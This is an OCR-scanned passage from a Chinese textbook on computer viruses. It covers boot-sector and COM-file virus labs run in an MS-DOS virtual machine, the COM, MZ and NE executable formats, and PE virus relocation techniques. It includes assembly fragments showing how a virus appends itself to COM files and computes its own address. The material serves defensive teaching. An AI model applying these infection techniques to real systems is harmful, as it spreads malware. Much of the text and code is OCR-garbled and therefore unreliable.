mov word ptr ds:[7d30h],ax ;save original int13 vector 
mov word ptr ds:[7d32h], bx 
v6: mov dl,byte ptr ds:[7df8h] ;load drive letter 
v7: Jmp 0000:7C00 


db 0eah, 00h, 7ch, 00h, 00h ; // 这 里 是 个 跳 转 指令 的 二 进 制 代 码 


(4) 读 入 原 主 引导 分 区 , 转 去 执行 操作 系统 的 引导 工作 。 这 部 分 工作 可 以 参照 硬盘 引 


导 程 序 。 
3.1.2 引导 型 病毒 实验 
【实验 目的 】 


通过 实验 ,了 解 引 导 区 病毒 的 感染 对 象 和 感染 特征 ,重点 学 习 引 导 病 毒 的 感 当 机制 和 恢 


复 感染 病毒 文件 的 方法 ,提高 汇编 语言 的 使 用 能 力 。 
【实验 内 容 】 
本 实验 需要 完成 的 内 容 如 下 。 


(1) 引导 阶段 病毒 由 软盘 感染 人 硬盘 实验 。 通 过 触发 病毒 ,观察 病毒 发 作 的 现象 和 步骤 


学 习 病 毒 的 感 当 机制; 阅读 和 分 析 病 毒 的 代码 。 


(2) DOS 运行 时 病毒 由 硬盘 感染 软盘 的 实现 。 通 过 触发 病毒 ,观察 病毒 发 作 的 现象 和 


步骤 学 习 病 毒 的 感染 机 制 ; 阅读 和 分 析 病 毒 的 代码 。 
【实验 环境 】 
(1) VMWare Workstation5. 5. 3。 
(2) MS-DOS 7. 10。 
【实验 素材 】 
本 书 配 套 素材 experiment 目录 下 的 bootvirus 目录 。 
【实验 步骤 】 
第 一 步 : 环境 安 效 。 


安装 虚拟 机 VMWare, 在 虚拟 机 环境 内 安装 MS-DOS 7. 10。 安 狼 步 又 参考 本 书 配套 素材 。 


大 大 
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第 二 步 : 软盘 感染 便 盘 。 


(1) 运行 虚拟 机 ,检查 目前 虚拟 人 硬盘 是 否 合 


从 含有 病毒 。 图 3-1 所 示 为 没有 病毒 正常 启动 
硬盘 的 状态 。 


Starting MS-DOS 7?.1... 


elcome to MS-DOS 7?.10... 
opyright Microsoft Corp. hll rights reserved. 


v1.0 Copyright 1995 Vincent Pendquerc h. fAll Rights Reserved. 
installed in memory. 

installed. 

OQ.320: loaded consuming 11840 bytes. 
SHARE v?.10 (Revision 4.11.1492) 


opyright (cl 1989-2<003 Datalight, Inc. 


installed. 


uteMouse v1.9.1 [DOS] 
Installed at PS/z port 


ow you are in MS-DOS 7?.10 prompt. Type "HELP’ 


for help. 
二 


图 3-1 没有 病毒 正常 启动 硬盘 的 状态 


(2) 在 本 书 配 套 系 材 中 复制 含有 病毒 的 虚拟 软盘 virus. img。 


(3) 将 含有 病毒 的 软盘 搬入 虚拟 机 引导 ,可 以 看 到 闪 动 的 字符 “*^^*”, 如 图 3-2 所 
示 。 按 任意 键 进 入 图 3-3 所 示 的 画面 。 


图 3-2 出现 字 符 图 3-3 ”病毒 画面 


第 三 步 : 验证 便 盘 已 经 被 感染 。 
(1) 取出 虚拟 软盘 ,通过 便 盘 引导 ,再 次 出 现 了 病毒 的 团 面 (图 3-4) 。 


图 3-4 再 次 出 现 病毒 画面 
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(2) 按 任 意 键 后 正常 引导 了 DOS 系统 (图 3-5)。 可 见 , 便 盘 已 经 被 感染 。 


starting MS-DOS 7?.1... 


elcome to MS-DOS 7.10... 
opyright Microsoft Corp. fll rights reserved. 


Killer vi.0 Copyright 1995 Vincent Penguerc’ h. fAll Rights Reserved. 
killer installed in memory. 
DOSKEY installed. 
DOSLFN ©Q.320: loaded consuming 11840 bytes. 
SHARE ve? .10 (Revision 4.11.1492) 
opyright (c) 19383-2003 Datalight, Inc. 


installed. 


uteMouse v1.9.1 [DOS]J 
Installed at PS/2 port 


Ow you are in MS-DOS 7?7.10 prompt. Type “HELP” for help. 


:\> 


[| /9 -加 [mi mn: rl 
图 3-5 硬盘 已 被 感染 
第 四 步 : 硬盘 感染 软盘 。 
(1) 下 载 empty. img ,并 且 将 它 插 和 人 虚拟 机 ,局 动 计 算 机 ,由 于 该 盘 为 空 , 如 图 3-6 所 示 。 


图 3-6 软盘 为 空 时 的 显示 界面 


(2) 取出 虚拟 软盘 ,从 便 盘 司 动 ,通过 命令 format A: /q 快速 格式 化 软盘 。 可 能 提示 出 
背 , 这 时 只 要 按 肛 键 即 可 ,如 图 3-7 所 示 。 

(3) 成 功 格式 化 后 的 结果 如 图 3-8 所 示 。 

(4) 不 要 取出 虚拟 软盘 ,重新 启动 虚拟 机 ,这 时 是 从 empty. img 引导 ,可 以 看 到 病毒 的 
画面 ,如 图 3-9 所 示 。 按 任意 键 进入 如 图 3-10 所 示 的 画面 。 可 见 , 病 毒 已 经 成 功 由 硬盘 传 


本 > -ks E 
染 给 了 软盘 。 


~ 
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:\>format f:/q 
Insert new diskette for drive ff: 
nd press ENTER when ready... 


hecking existing disk format. 
Invalid existing format. 
his disk cannot be QuickFormatted. 
roceed with Unconditional Format (Y/N)?Uu 
Formatting 1.44M 
Format complete. 


aeneral failure reading drive ff 
bort, Retry, Fail?_ 


图 3-7 格式 化 软盘 


his disk cannot be QuickFormatted. 
Proceed with Unconditional Format (Y/N)?U 
Formatting 1.44M 
Format complete. 


aeneral failure reading drive fl 
Abort, Retry, Fail?r 


olume label (11 characters, ENTER for none})? 


aeneral failure reading drive ff 
Abort, Retry, Fail?r 


1,024 buytes total disk space 
1,024 butes available on disk 


5l< buUtes in each allocation unit. 
ec allocation units available on disk. 


Olume Serial Number is QA7?4-1415 


uickFormat another (YAN)?n 


图 3-8 格式 化 后 的 效果 


图 3-9 病毒 画面 图 3-10 ”病毒 由 硬盘 传染 给 了 软盘 
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3.2 16 位 可 执行 文件 病毒 编制 扩 术 


3.2.1 16 位 可 执行 文件 结构 及 运行 原理 


文件 型 病毒 是 病毒 中 的 大 家 族 , 顾 名 思 义 ,该 病毒 主要 是 感染 文件 (包括 COM、EXE、 
DRV 、BIN、OVL 和 SYS 等 扩展 名 的 文件 ) 。 当 它们 激活 时 ,感染 文件 又 把 自身 复制 到 其 他 
干净 文件 中 ,并 能 在 存储 介质 中 保存 很 长 时 间 ,直到 病毒 又 被 激活 。 由 于 技术 的 原因 ,文件 
型 病毒 的 活力 远 比 引导 型 病毒 吕 。 目 前 存在 着 数 千 种 文件 型 病毒 ,它们 不 但 活动 在 DOS 16 
位 环境 中 ,而且 在 Windows 32 位 系统 中 依然 非常 活跃 ,同时 ,有 些 文件 型 病毒 能 很 成 功 地 
感染 OS2、Linux、UNIX 和 Macintosh 环境 中 的 文件 。 编 制 文 件 型 病毒 的 关键 是 分 析 操 作 
系统 中 的 文件 结构 及 其 执行 原理 。 本 节 主 要 介绍 16 位 系统 中 常见 的 文件 结构 及 其 运行 原 
理 ,为 后 续 草 节 做 准备 。 

1. COM 格式 


最 简单 的 可 执行 文件 就 是 DOS 下 的 COM 文件 。 由 于 当时 计算 机 64KB 内 存 的 限制 ， 
就 产生 了 COM 文件 。COM 格式 文件 最 大 为 64KB, 内 含 16 位 程序 的 二 进 制 代码 映像 , 没 
有 重 定 位 信息 。COM 文件 包含 程序 二 进 制 代码 的 一 个 绝对 映像 ,也 就 是 说 ,为 了 运行 程序 
准确 的 处 理 器 指令 和 内 存 中 的 数据 ,DOS 通过 直接 把 该 映像 从 文件 复制 到 内 存 来 加 载 
COM 程序 ,系统 不 需要 做 重 定位 工作 。 

为 加 载 一 个 COM 程序 ,DOS 试图 分 配 内 存 , 因 为 COM 程序 必须 位 于 一 个 64KB 的 段 
中 ,所 以 COM 文件 的 大 小 不 能 超过 65 024B(64KB 减 去 用 于 PSP 的 256B 和 用 于 一 个 起 始 
堆栈 的 至 少 256B) 。 如 果 DOS 不 能 为 程序 .一 个 PSP(Program Segment Prefix, 程 序 段 前 
级 ) 和 一 个 起 始 堆 栈 分 配 足 够 内 存 , 则 分 配 尝 试 失败 。 否 则 ,DOS 分 配 尽 可 能 多 的 内 存 ( 直 
至 所 有 保留 内 存 ) ,即使 COM 程序 本 号 不 能 大 于 64KB。 在 试图 运行 男 一 个 程序 或 分 配 男 
外 的 内 存 之 前 ,大 部 分 COM 程序 释放 任何 不 需要 的 内 存 。 分 配 内 存 后 ,DOS 在 该 内 存 的 头 
256B 建立 一 个 PSP。 结 构 如 表 3-1 所 示 。 


表 3-1 COM 格式 的 结构 及 说 明 


0000h 中 断 20H 

0002h 以 字 节 计算 的 内 存 大 小 (利用 该 项 可 看 出 是 否 感 染 引导 型 病毒 ) 
0004h 保留 

0005h 至 DOS 的 长 调用 

o00Ah | 2 | INT2HADIP 

000Ch INT 22H 入 口 CS 

000Eh INT 23H 入 口 IP 

0010h 2 | INT23HAD CS 

0012h ”2 | INT2MH 和 DIP 

0014h 2 INTzHA 和 DCS 

0016h 父 进程 的 PSP 段 值 (可 测 知 是 否 被 跟踪 ) 
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续 表 
0018h 存放 20 个 SOFT 号 
002Ch 环境 块 段 地 址 (从 中 可 获知 执行 的 程序 名 ) 
002Eh 存放 用 户 栈 地 址 指针 
00 保留 
0050h DOS 调用 (INT 21H/RETF) 
0053h ”2 | 保留 
0055h 扩展 的 FCB 头 
005Ch 格式 化 的 FCB] 
006Ch 格式 化 的 FCB2 
007Ch | 4 | 人 
0080h | 80 | 命令 行 参数 长 度 
0081h 命令 行 参数 


如 果 PSP 中 的 第 一 个 FCB 含有 一 个 有 效 驱 动 器 标识 符 , 则 置 AL 为 00H ,否则 为 
OFFH。DOS 还 置 AH 为 00H 或 OFFH ,这 依赖 于 第 二 个 FCB 是 否 含 有 一 个 有 效 驱 动 硕 标 
识 符 。 创 建 PSP 后 ,DOS 在 PSP 后 立即 开始 ( 偏 移 100H) 加 载 COM 文件 , 它 置 SS.DS 和 
ES 为 PSP 的 段 地 址 ,接着 创建 一 个 堆栈 。 为 了 创建 这 个 堆栈 ,DOS 置 SP 为 0000H。 如 果 
没有 分 配 64KB 内 存 , 则 要 求 置 寄存 器 大 小 是 所 分 配 的 字 节 和 总数 加 2 的 值 。 最 后 , 它 把 
0000H 推进 栈 中 ,这 是 为 了 保证 与 早期 DOS 版 本 上 设计 的 程序 的 兼容 性 。 

DOS 通过 控制 传递 偏 移 100H 处 的 指令 而 启动 程序 。 程 序 设计 者 必须 保证 COM 文件 
的 第 一 条 指令 是 程序 的 入 口 点 。 因 为 程序 是 在 偶 移 100H 处 加 载 ,所 以 所 有 代码 和 数据 偏 
移 也 必须 相对 于 100H。 汇 编 语 言 程 序 设计 者 可 通过 设置 程序 的 初 值 为 100H 保证 这 一 点 
(例如 ,通过 在 源 代 码 的 开始 使 用 语句 org 100H) 。 

2. MZ 格式 

COM 发 展 下 去 就 是 MZ 格式 的 可 执行 文件 ,这 是 DOS 中 具有 重 定位 功能 的 可 执行 
文件 格式 。MZ 可 执行 文件 内 含 16 位 代码 ,在 这 些 代 码 之 前 加 了 一 个 文件 头 , 文 件 头 中 
包括 各 种 说 明 数 据 , 例 如 ,第 一 句 可 执行 代码 执行 指令 时 所 需要 的 文件 入 口 点 、 堆 栈 的 位 
置 重 定位 表 等 。 操 作 系 统 根据 文 件 头 的 信息 将 代码 部 分 装 入 内 存 , 然 后 根据 重 定 位 表 
修正 代码 ,最 后 在 设置 好 堆栈 后 从 文件 头 中 指定 的 人口 开始 执行 。 因 此 DOS 可 以 把 MZ 
格式 的 程序 放 在 任何 它 想 要 的 地 方 。 图 3-11 所 示 为 MZ 格式 的 可 执行 文件 的 简单 结构 
示意 图 。 


MZ 标志 

其 他 信息 MZ 文件 头 
重 定位 表 的 字 节 偏 移 量 

重 定位 表 重 定位 表 
可 重 定 位 程序 映像 二 进 制 代 码 


3-11 MZ 格式 文件 结构 示意 图 
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// Mz 格式 可 执行 程序 文件 头 


struct HeadEXE 

{ 
WORD wType; 
WORD wLastSecSize; 
WORD wFileSize; 
WORD wRelocNum; 
WORD wHeadSize; 
WORD wReqMin; 
WORD wReqMax; 
WORD wInitSS; 
WORD wInitSP; 
WORD wChkSum; 
WORD wInitIP; 
WORD wInitCS; 
WORD wFirstReloc; 
WORD wOverlap; 
WORD wReserved[ 0x20 ] ; 
WORD wNEOffset; 

}; 


3. NE 格式 


// 00H MZ 标志 

// 02H 最 后 扇 区 被 使 用 的 大 小 
// 04H 文件 大 小 

// 06H 重 定位 项 数 

// 08H 文件 头 大 小 

// 0aH 最 小 所 需 内 存 

// 0CH 最 大 所 需 内 存 

// 0EH SS 初 值 

// 10H SP 初 值 

// 12H 校 验 和 

// 14H IP 初 值 

// 16H CS 初 值 

// 18H 第 一 个 重 定位 项 位 置 
// 1aH 覆盖 

// 1CH 保留 

// 3CH NE 头 位 置 


为 了 保持 对 DOS 的 兼容 性 并 满足 Windows 的 需要 ,Windows 3. x 中 出 现 的 NE 格式 
的 可 执行 文件 中 保留 了 MZ 格式 的 头 , 同 时 NE 文件 又 加 了 一 个 自己 的 头 , 之 后 才 是 可 执行 
文件 的 可 执行 代码 。NE 类 型 包括 了 EXE、 DLL 、DRV 和 FON 4 种 类 型 的 文件 。NE 格式 
的 关键 特性 是 它 把 程序 代码 数据 及 资源 隔离 在 不 同 的 可 加 载 区 中 , 信 由 符号 输入 和 输出 ， 


实现 所 谓 的 运行 时 动态 链接 。 


图 3-12 所 示 为 NE 格式 的 可 执行 文件 的 结构 示意 图 。 


MS-DOS 头 
保留 区 域 
Windows 头 偏 移 
DOS Stub 程序 
信息 块 

段 表 

资源 表 
驻 留 名 表 

模块 引用 表 
引入 名 字 表 

人 人口 表 
非 驻 留 名 表 
代码 段 和 数据 段 
重 定位 表 


DOS 文件 头 


NE 文件 头 


程序 区 


3-12 NE 格式 文件 结构 示意 图 


16 位 的 NE 格式 文件 装载 程序 (NE Loader) 读 取 部 分 磁盘 文件 ,并 生成 一 个 完全 不 同 
的 数据 结构 ,在 内 存 中 建立 模块 。 当 代码 或 数据 需要 装 入 时 ,装载 程序 必须 从 全 局 内 存 中 分 
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配 出 一 块 , 查 找 原始 数据 在 文件 中 的 位 置 ,找到 位 置 后 再 读 取 原始 的 数据 ,最 后 再 进行 一 些 
修正 。 另 外 ,每 一 个 16 位 的 模块 (Module) 要 负责 记 住 现在 使 用 的 所 有 上段 选择 符 , 该 选择 符 
表示 该 段 是 否 已 经 被 抛弃 等 信息 。 


// NE 格式 可 执行 文件 文件 头 
struct HeadNE 
{ 
WORD wType; //NE 标志 


BYTE wLinkerVerMa]jor; 

BYTE wLinkerVerMinor; 

WORD wEntryOffset; 

WORD wEntrySize; 

DWORD dReserved; 

WORD wModelF1ag; 

WORD wDGROUPseg; 

WORD wInitLocalHeapSize; 

WORD wInitStackSize; 

WORD wInitIP; 

WORD wInitCS; 

WORD wInitSP; 

WORD wInitSS; 

WORD wSegTableEntrys; 

WORD wModelRefEntrys; 

WORD wNoResdNameTableSize; 
WORD wSegTableOffset; 

WORD wResourceOffset; 

WORD wResdNameTableOffset; 
WORD wModelRefOffset; 

WORD wInputNameTableOffset; 
DWORD wNoResdNameTableOffset; 
WORD wMovableEntrys; 

WORD wSegStartOffset; 

WORD wResTableEntrys; 

BYTE bOperatingSystem; 

BYTE bExtFl1ag; 

WORD wFLAOffsetBySector; // 快 速 装 入 区 ,Windows 专用 
WORD wFLASectors; //Windows 专用 
WORD wReserved; 

WORD wReqWindowsVer; //Windows 专用 


3.2.2 COM 文件 病毒 原理 


COM 文件 是 一 种 单 段 执行 结构 的 文件 ,其 执行 文件 代码 和 执行 时 内 存 映 像 完 全 相同 ,起 始 
执行 偏 移 地 址 为 100H, 对 应 于 文件 的 偏 移 00H( 文 件 头 )。 感 染 COM 文件 的 典型 做 法 如 下 。 


cs:0100 jmp endoffile //db 0E9H,，0100H 处 为 文件 的 开头 
//dw coM 文件 的 实际 大 小 
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endoffile: 


Virusstart: // 病 毒 代 码 开 始 
mov ax, orgcode //orgcode db 3 dup(?) 
// 源 文件 由 0100 开始 的 3 个 字 节 
mov [100], ax 
mov al, [orgcode + 2] 
mov [102], al 
virussize = $ ~— virusstart 
resume: 
jmp 100 //db OE9H 
//dw 当前 地 址 - (COM 文件 的 实际 大 小 + 病毒 代码 大 小 ) 


病毒 要 感染 COM 文件 , 先 将 开始 的 3 个 字 节 保存 在 orgcode 中 ,并 将 这 3 个 字 节 更 改 
为 0OE9H 和 COM 文件 的 实际 大 小 的 二 进 制 编码 。 然 后 ,将 resume 开始 的 3 个 字 节 改 为 
0E9H 和 表达 式 ( 当 前 地 址 -COM 文件 的 实际 大 小 十 病毒 代码 大 小 ) 的 二 进 制 编码 ,以 便 在 
执行 完 病 毒 后 转向 执行 源 程序 。 最 后 ,将 病毒 写 和 人 源 COM 文件 的 末尾 。 

此 外 ,完整 的 病毒 感染 代码 还 需要 感染 标记 判断 .文件 大 小 判断 等 。 


3.2.3 COM 文件 病毒 实验 


【实验 目的 】 
擎 握 COM 病毒 的 传播 原理 。 
【实验 环境 】 


(1) VMWare Workstation 5.5. 3。 

(2) MS-DOS 7. 10。 

(3) MASM611。 

【实验 步骤 】 

(1) 安装 虚拟 机 VMWare, 安 装 步 又 参考 网 上 下 载 的 实验 配套 资料 “解压 缩 目录 \ 
ApplicationXMSDOS71\ 虚 拟 机 上 安装 MSDOS. doc” 文 档 。 

(2) 在 虚拟 机 环境 内 安 交 MS-DOS 7. 10。 

(3) 在 MS-DOS C: \MASM 目录 下 安装 MASM611 ,然后 将 binr 目录 下 的 link. exe 复 
制 到 bin 目录 下 。 

(4) 从 本 书 配 套 素 材 experiment\com 下 复制 病毒 程序 Virus. asm 及 测试 程序 源 代码 
Belnfected. asm 。 

如 果 直 接 在 本 书 配套 素材 中 获得 了 虚拟 机 映像 文件 ,可 以 直接 装载 这 个 虚拟 机 文件 。 
效 载 了 这 个 虚拟 机 文件 后 ,实验 环境 就 已 经 完整 ,实际 需要 的 两 个 代码 也 能 够 在 相关 目录 中 
找到 了 (图 3-13) 。 

1. 编译 程序 

编译 链接 test. asm ,形成 test. com 测试 程序 。 

编译 链接 virus. asm, 生 成 病毒 程序 virus. exe。 

两 个 程序 的 编译 过 程 完 全 相同 ,在 此 以 编译 virus. asm 为 例 , 详 细 过 程 如 下 。 

(1) masm virus. com。 输 入 该 语句 ,可 以 生成 virus. obj。 具 体 如 图 3-14 所 示 。 


MS-DOS - VMware Workstation 


传统 计算 机 病毒 


| Eile Edit Yiew VM TIeam Windows Help 


| 时 m 和 [四 | 前 而 珊 || 瑟 加 年 | 吕 | 四 


eI MS-DOS 


82 file(s) 
2 dir(s) 


C:\MASM611\NBIN>_ 


87~899~1992 
81“16“1992 
83~187~1992 
81~21~“1992 
07/16/1992 
87~17“1992 
83~18~1992 
87~“14“-1992 
87~1d4“1992 
8B6“287~1992 
08914/2807 
609/14/280867 
837~11“268108 
83~21~-268688 
0313/2889 
03722/20109 
83/22/20109 
89/12/286109 
83x15-2888 
69712/28109 
89~12~2818 


5,414,578 bytes 
223,190,272 bytes free 


198 : 
19 : 


QH . EXE 

QH. ICO 
MOUSE . COM 
UNDEL . ExE 
TLD1LOC .DLL 
TLHNBLULC .DLL 
TUO0LHELP . DLL 
WX. EXE 
HXSRUR. EXE 
UMB . 386 
NEW-VARS . BAT 
NEW-CONF. SYS 
UIRUS. OBJ 
test.as™ 
TEST. OBJ 
TEST. COM 
UIRUS.COM 
BOOT. OBJ 
UIRUS. ASM 
boot.as™ 
BOOT.COM 


[三 | 


图 3-13 ”代码 已 存在 于 相关 目录 中 


MS-DOS - VMware Workstation 


| Eile Edit View VM Ieam Windows Help 


| 时 而 | 二 | 丙 可 古本 器 下 | 可 | 名 


ei MS-DOS 


32， 


89“14“26887 
63z11/2818 
83A21/28088 
8937~137268689 
03/22/28108 
83/22/2818 
868912/2818 
683715/28088 
689712/2818 
49A12/2819 


NEN-CONF .SYS 
UIRUS .0BJ 
test .asM 
TEST. OBJ 
TEST.COM 
UIRUS.COM 
BOOT. OBJ 
UIRUS. NASM 
boot .asM 
B00T. COM 


03 


82 file(s) 
2 dir(s) 


5,414,578 bytes 
523,190,272 bytes free 


C:\MASMB11INBIN>MasM virus,asM 
Microsoft (R) MASM Compatibility Driver 
Copyright (CLC) Microsoft Corp 1993. hll rights reserved. 


Invoking: ML.EXE /I1. /2M /CcC /Ta virus.as™ 


Macro fssembler Version 6.11 
Microsoft Corp 1981-1993, hll rights reserved, 


Assembling: virus.as™ 


C:\MASM611\NBIN>_ 


图 3-14 生成 virus. obj 


(2) link viurs. obj。 输 入 该 指令 ,生成 virus. com。 在 默认 情况 下 ,会 生成 virus. exe, 可 
以 在 link 过 程 中 把 名 称 改 为 com, 如 图 3-15 所 示 。 

(3) 检查 文件 。 检 查 当 前 目录 下 是 否 生 成 了 virus. com。 如 果 存 在 则 已 经 正确 编译 。 
以 同样 的 步骤 生成 test. com。 

2. 实验 步骤 

(1) 实验 准备 。 在 C:\MASMA\Bin 目录 下 建立 del. txt 文件 ,并 且 将 test. com 和 病毒 
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MS-DOS - VMware Workstation 


=|9|x| 


| Eile Edit View VM Ieam Windows Help 


1 多 | 万 回 加 | 加 | 加 


mj Db MS-DOS 


EC:NMhSM611、\BIN>link virus.obj 


Harning: running progra™m in real Mode: CPU already in protected or virtual Mode 


Microsoft (R) Segmented Executable Linker Version 5.31.889 Jul 13 1992 


Copyright (CGC) Microsoft Corp 1984-1992. hll rights reserved. 


Run File [virus.exe]: virus .COH 

List File [nul.Map]: 

Libraries [.1ib]: 

Definitions File [nul.def]: 

LINK : fatal error L1893: virus.ob] : object file not found 


C:NMRSM611\BIN>_ 


图 3-15 生成 virus. com 


virus. com 复制 到 此 目录 下 。 


(3) 运行 病毒 。 


BMS-DOS - VMware Workstation 


=] :2 


(2) 感染 前 的 运行 情况 。 执 行 test. com 观察 未 感染 前 的 运行 结果 ,如 图 3-16 所 示 。 


=|9| x 


| Eile Edit View VM Ieam Windows Help 


| 昌 WP》 辣 || 癌 于 丁 || 廿 回 面 | 器 | 名 


se MS-DOS 


C:\MASMB11N\NBIN>test.com 


| =1|L=!? |This a simple coM prograM for a test 


C :\MRSM611\BIN>_ 


图 3-16 未 感染 前 的 运行 情况 


图 3-17 所 示 。 


(4) 观 
两 部 分 组 成 ,1 
所 示 。 


首先 显示 了 病毒 代码 的 一 部 分 工作 ,然后 ,显示 了 目 


【程序 源码 了 】 
本 实验 以 尾部 感染 COM 文件 的 病毒 为 例子 ,其 中 待 感染 COM 文件 源 代 码 


BeInfected. asm、 病 毒 源 文件 源 代 人 码 virus. asm 参见 


MAD < 


执行 virus. com 文件 以 感染 test. com 文件 并 且 自 动 删除 del. txt, 如 


察 感染 后 的 效果 。 执 行 test. com ee A com 运行 过 程 由 


9 身 的 原 有 功能 ,如 图 3-18 


本 书 配套 系 材 。 
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晤 MS-DOS - VMware Workstatiomn =|9|x| 
| Ele Edit Yiew YM Team Windows Help 
|sunlp|| 问 厂 太 | 囊 日 面 | 号 


a MS-DOS 
EXE ,519 81“217“1992 :55p UNDEL .EXE 
DLL ,692 677z16z1992 :52p TLD1LOC .DLL 
DLL ,488 8771771992 :d2a TLHNBLOC .DLL 
DLL ,128 68371971992 :19a TOOLHELP. DLL 
EXE ,077 090897141992 :51p Hx.ExE 
EXE ,928 86877141992 :51p HXSRUR, EXE 
386 ,273 8986-287-1992 :49p UMB.386 
BAT 175 86914/28067 :36a NEHW-VARS. BAT 
SYS 227 8069/14/28087 :38a NEHWH-CONF.SYS 
ASM 318 63/21/2888 :52p test.asM 
OBJ 172 18/12/2818 :59p TEST.0BJ 
COM 828 18/12/2818 :BBp TEST,.,COM 
COM 756 83/22/2818 :24p VIRUS.COM 
OBJ 341 89/12/2818 18:38p BOOT.OBJ 
ASM ,874 808315A28868 9:i2p VIRUS.ASM 
ASM ,B85 69712/2818 18:38p boot .asM 
COM ,7273 049712/2818 18:39p BOOT.COM 

81 filel(s) 5,413,814 bytes 

2 dir(s) 523,198,464 bytes free 


LC:\MASMBG11INBIN>Vvirus.co™m 
You are infected by a simple coM virus 
LPU error: incorrect opcode. killing process. 


C:\MASM611N\NBIN>_ 


[= 


图 3-17 运行 病毒 


时 MS-DOS - VMware Workstation -Io|X| 


| Eile Edit View VM JTeam Windows Help 
| 量 了 [和 多 | 阔 画 硬 || 盏 回 罩 | 口 | 四 


eM Db MS-DOS 


C:\MASM6G11N\BIN>test.com 
You are infected by a simple coM virus 
日 二 日 


| =1|L=t? |This a simple coM prograM for a test 


| 
日 
C :NMASM611NBIN>_ 


局 区 发 网 :2 
图 3-18 感染 后 的 效果 


3.3 32 位 可 执行 文件 病毒 编制 技术 


学 习 丁 前 ,建议 学 习 并 掌握 PE 可 执行 文件 的 结构 及 运行 原理 。 推 荐 参考 罗 云 彬 编 
着 的 《Windows 环境 下 32 位 汇编 语言 程序 设计 兴 第 2 版 )。 

尽管 基于 16 位 架构 的 病毒 依然 存在 ,尽管 有 些 病 毒 创 作者 还 沉浸 在 获得 16 位 架构 特 
权 的 喜悦 中 ,但 32 位 架构 、64 位 架构 才 代 表 当 今 潮流 。 古 语 云 :“ 知 己 知 彼 , 百 战 不 殖 ”。 尺 
管 本 书 的 目的 是 计算 机 病毒 防范 技术 ,但 学 习 并 精通 32 位 操作 系统 下 的 病毒 制作 理论 是 当 
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今 病 毒 防范 的 重要 基础 。 
3.3.1 PE 文件 结构 及 其 运行 原理 


PE(Portable Executable ,可 移植 的 执行 体 ) 是 Win32 环境 自身 所 带 的 可 执行 文件 格 
式 。 它 的 一 些 特性 继承 自 UNIX 的 COFF(Common Object File Format) 文 件 格 式 。 可 移 
植 的 执行 体 意味 着 此 文件 格式 是 路 Win32 平台 的 ,即使 Windows 运行 在 非 Intel 的 CPU 
上 ,任何 Win32 平台 的 PE 装载 需 都 能 识别 和 使 用 该 文件 格式 。 当 然 ,移植 到 不 同 的 CPU 
上 PE 执行 体 必 然 得 有 一 些 改 变 。 除 VxD 和 16 位 的 DLL 外 ,所 有 Win32 执行 文件 都 使 用 
PE 文件 格式 。 因 此 ,研究 PE 文件 格式 是 我 们 洞悉 Windows 结构 的 恨 机 。 


3.3.2 PE 文件 型 病毒 关键 技术 


在 Win32 下 编写 Ring3 级 别 的 病毒 不 是 一 件 非常 困难 的 事情 ,但 是 ,在 Win32 下 的 系 
统 功能 调用 不 是 直接 通过 中 断 来 实现 的 ,而 是 通过 DLL 导出 的 。 因 此 ,在 病毒 中 得 到 API 
入 口 是 一 项 关键 任务 。 虽 然 ,Ring3 给 我 们 市 来 了 很 多 不 方便 的 限制 ,但 这 个 级 别 的 病毒 有 
很 好 的 兼容 性 ,能 同时 适用 于 Windows 9x 和 Windows 2000 环境 。 编 写 Ring3 级 病毒 ,有 
几 个 重要 问题 需要 解决 。 

1. 病毒 的 重 定位 

我 们 写 正常 程序 的 时 候 根 本 不 用 去 关心 变量 (常量 ) 的 位 置 ,因为 源 程序 在 编译 的 时 候 
在 内 存 中 的 位 置 都 被 计算 好 了 。 程 序 装 入 内 存 时 ,系统 不 会 为 它 重 定 位 。 编 程 时 需要 用 到 
变量 (常量 ) 的 时 候 直 接 用 它们 的 名 称 访问 (编译 后 就 是 通过 偏 移 地 址 访问 ) 即 可 。 

病毒 不 可 避免 地 也 要 用 到 变量 (常量 ) , 当 病 毒 感染 答 主 程序 后 ,由 于 其 依附 到 宿主 程序 
中 的 位 置 各 有 不 同 , 它 随 着 答 主 程序 载 入 内存 后 ,病毒 中 的 各 个 变量 (常量 ) 在 内 存 中 的 位 置 
自然 也 会 随 之 改变 。 如 果 病 毒 直 接 引 用 变量 就 不 再 准确 ,势必 导致 病毒 无 法 正常 运行 。 因 
此 ,病毒 必须 对 所 有 病毒 代码 中 的 变量 进行 重新 定位 。 病 毒 重 定位 代码 如 下 。 

call delta 

delta: pop ebp 


lea eax, [ebp + (offset varl - offset delta) ] 


当 pop 语句 执行 完 之 后 ,ebp 中 存放 的 是 病毒 程序 中 标号 delta 在 内 存 中 的 真正 地 址 。 
如 果 病 毒 程序 中 有 一 个 变量 varl, 那 么 该 变量 实际 在 内 存 中 的 地 址 应 该 是 ebp 十 (offset 
varl-offset delta) 。 由 此 可 知 ,参照 量 delta 在 内 存 中 的 地 址 加 上 变量 varl 与 参考 量 之 间 的 
距离 就 等 于 变量 varl 在 内 存 中 的 真正 地 址 。 

接 下 来 ,用 一 个 简单 的 例子 来 说 明 这 个 问题 。 假 设 有 一 段 简 单 的 汇编 代码 : 


dwVar dd 了 
call (OF 
CQ : 
pop ebx 


sub ebx, offset (2B 
mOV eax，[ebx+ offset dwVar | 
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执行 这 段 代 码 后 ,eax 存放 的 就 是 dwVar 的 运行 时 刻 的 地 址 。 如 果 还 不 好 理解 ,可 以 
假设 这 段 代 码 在 编译 运行 时 有 一 个 固定 起 始 流 载 地 址 (这 有 点 像 DOS 时 代 的 COM 文件 )。 
不 失 一 般 性 ,可 以 令 这 个 固定 起 始 装载 地 址 为 00401000H。 这 段 代 码 编译 后 的 可 执行 代码 
在 内 存 中 的 映像 为 : 


00401000 00000000 BYTE 4 DUP(4) 
00401004 E800000000 call 00401009 
00401009 5B pop ebx //ebx = 00401009 


0040100A 81EB09104000 sub ebx, 00401009 //ebx = 0 

00401010 8B8300104000 mov eax, dword prt [ebx + 00401000] 
// 最 后 一 句 相 当 于 
//mov eax, dword prt [00401000] 
// 或 mov eax, dwVar 


如 果 理 解 了 这 个 固定 起 始 地 址 的 婆 载 过 程 ,动态 的 站 载 就 很 容易 理解 了 。 接 下 来 ,假设 
将 可 执行 程序 动态 地 加 载 到 内 存 中 。 


00801000 00000000 BYTE 4 DUP(4) 
00801004 E800000000 call 00801009 
00801009 5B pop ebx //ebx = 00801009 


0080100A 81EB09104000 sub ebx, 00401009 //ebx = 00400000 
00801010 8B8300104000 mov eax, dword prt [ebx + 00401000] 
// 最 后 一 名 相当 于 
//mov eax, [00801000] 
// 或 mov eax, dwVar 


2. 获取 API 函数 

